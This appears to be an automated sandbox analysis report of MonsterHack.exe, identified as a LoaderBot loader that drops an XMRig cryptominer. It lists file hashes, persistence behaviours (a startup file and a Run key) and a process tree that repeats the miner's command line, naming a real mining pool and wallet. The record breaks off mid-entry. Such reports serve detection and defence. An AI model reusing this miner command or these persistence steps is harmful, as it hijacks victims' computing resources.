Analysis

  • max time kernel
    150s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    23-06-2024 11:50

General

  • Target

    MonsterHack.exe

  • Size

    4.0MB

  • MD5

    6efea760737c914276321712b7c5faf0

  • SHA1

    cac227707c574deba24c71c85e64e0da1e246b11

  • SHA256

    6952e0e1fc7847b46473a9f22ba352a06623f966e08bb6f79a8b189a117e1510

  • SHA512

    f60077d79a205a78ca86dbd32072604298e2df14dbbc96c94561765289aaeb79123b5fe747e9dcda8289682c57805b9449c67f21f10f4b2453abf09b0ac88561

  • SSDEEP

    49152:5NDFFPJu8fBsVE6ij+RNg+UKpBvtqB3m1RC3:vzP88fBsnZTgOtqB3m1RC3

Malware Config

Signatures

  • LoaderBot

    LoaderBot is a loader written in .NET downloading and executing miners.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • LoaderBot executable 1 IoCs
  • XMRig Miner payload 32 IoCs
  • Drops startup file 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\MonsterHack.exe
    "C:\Users\Admin\AppData\Local\Temp\MonsterHack.exe"
    1⤵
    • Drops startup file
    • Loads dropped DLL
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious behavior: RenamesItself
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2280
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2692
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:872
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2384
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2044
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2700
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:1952
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:1692
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:1424
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2672
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:1364
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:840
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:1736
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:688
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2300
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:1008
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2796
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:896
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:940
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2532
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2520
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:1364
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:896
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2900
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2464
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2448
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:1492
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2172
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2860
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:1352
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:1700
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:1596
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:756
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:1924
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:924
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:1504
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:908
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2568
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:320
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:560
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:756
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2264
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:844
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2732
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:1904
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:1352
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2876
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2040
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:1680
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:1684
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:880
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2864
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2424
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2276
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2900
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2408
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2648
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2496
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:584
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2384
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:560
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2232
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:2708
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
